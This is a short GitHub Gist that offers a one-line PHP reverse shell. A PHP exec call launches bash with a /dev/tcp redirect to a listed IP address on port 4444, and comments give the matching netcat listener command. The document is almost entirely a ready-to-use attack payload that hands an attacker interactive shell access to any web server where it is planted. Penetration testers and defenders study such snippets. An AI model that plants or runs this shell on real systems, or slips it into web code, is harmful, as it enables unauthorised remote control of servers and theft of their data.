Skip to content

Instantly share code, notes, and snippets.

@enderphan94
Created August 13, 2020 14:01
Show Gist options
  • Save enderphan94/4206bc8ad01c497830228736cef33779 to your computer and use it in GitHub Desktop.
Save enderphan94/4206bc8ad01c497830228736cef33779 to your computer and use it in GitHub Desktop.
One line PHP Reverse Shell #php #reverseshell #onelinephpreverseshell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.103.123/4444 0>&1'");
#192.168.103.123 is your local machine ip
#run `nc -vnlp 4444` on your local machine
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment